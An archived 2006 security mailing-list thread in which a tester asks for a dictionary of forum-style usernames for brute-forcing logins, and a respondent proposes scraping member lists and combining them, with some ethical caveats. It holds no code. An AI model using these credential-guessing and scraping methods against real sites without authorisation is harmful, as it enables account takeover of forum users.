WebApp Sec mailing list archives
RE: dictionary of forum style usernames
From: "Griffiths, Ian" <Ian.Griffiths () liv-coll ac uk>
Date: Thu, 4 May 2006 12:50:49 +0100
I'm sure such a list could be derived from an existing member list from any forum out there, wget and some Perl or something, not sure what the ethical stance is on that. I'm not even sure on the ethics of going straight to the member table and picking up the single username field. You would need a forum admin who trusts you to use the stuff appropriately and possibly members who are willing to participate? I'm not sure - it is of course sufficiently anonymised in every other respect. If you want to brute force this data as it stands though you would also need the set of password hashes as well? Unlikely anyone will give this up too easily! I would also be interested to see that if you were able to get two member lists of maybe ten thousand members exactly how much overlap there is between the two lists - my suspicion would be not much. Therefore you might want to consider compounding a few lists so you get maybe 100k names or more. Ironically, most teenage **honey_girl_69x** usernames would actually make fantastic passwords, I don't think that was the intention :-) Ian -----Original Message----- From: Robin Wood [mailto:dninja () gmail com] Sent: 04 May 2006 12:32 To: Griffiths, Ian Cc: webappsec () securityfocus com Subject: Re: dictionary of forum style usernames As I said, the system I'm going to be testing has users whose usernames are going to be forum style (e.g. Luca89, mackerel, Maedhros, Magic Banana, mark_alec) rather than normal "human" name style (e.g. robin, peter, fred).
From previous experience with the site I know that a lot of users use
their username as their password so if I can get a reasonable list, preferably a few hundred at least, I'll try a brute force attack with a selection of common passwords and the username. I'm going to leave this going in the background while doing the rest of the tests so the more names the better. I know that the human style name lists exist as my ssh server regularly gets attacked by scripts trying long lists of usernames, does the same exist for forum style names? On 5/4/06, Griffiths, Ian <Ian.Griffiths () liv-coll ac uk> wrote:
How many records are you thinking? Also what are you aiming to achieve? I currently can't see any place where username actually matters? Ian -----Original Message----- From: Robin Wood [mailto:dninja () gmail com] Sent: 04 May 2006 08:53 To: webappsec () securityfocus com Subject: dictionary of forum style usernames Hi I'm going to be doing a test against a forum type system and want to have a go at bruteforcing a few logins. As it is a forum the login names aren't likely to be usual "human" names so I'm looking for a dictionary of names to try. Can anyone recommend one? Robin ---------------------------------------------------------------------- -- - Sponsored by: Watchfire The Twelve Most Common Application-level Hack Attacks Hackers continue to add billions to the cost of doing business online despite security executives' efforts to prevent malicious attacks. This whitepaper identifies the most common methods of attacks that we have seen, and outlines a guideline for developing secure web applications. Download this whitepaper today! https://www.watchfire.com/securearea/whitepapers.aspx?id=701300000007t 9r
------------------------------------------------------------------------
--
------------------------------------------------------------------------- Sponsored by: Watchfire The Twelve Most Common Application-level Hack Attacks Hackers continue to add billions to the cost of doing business online despite security executives' efforts to prevent malicious attacks. This whitepaper identifies the most common methods of attacks that we have seen, and outlines a guideline for developing secure web applications. Download this whitepaper today! https://www.watchfire.com/securearea/whitepapers.aspx?id=701300000007t9r --------------------------------------------------------------------------
Current thread:
- dictionary of forum style usernames Robin Wood (May 04)
- <Possible follow-ups>
- RE: dictionary of forum style usernames Griffiths, Ian (May 04)
- Re: dictionary of forum style usernames Robin Wood (May 04)
- RE: dictionary of forum style usernames Griffiths, Ian (May 04)
- Re: dictionary of forum style usernames Robin Wood (May 04)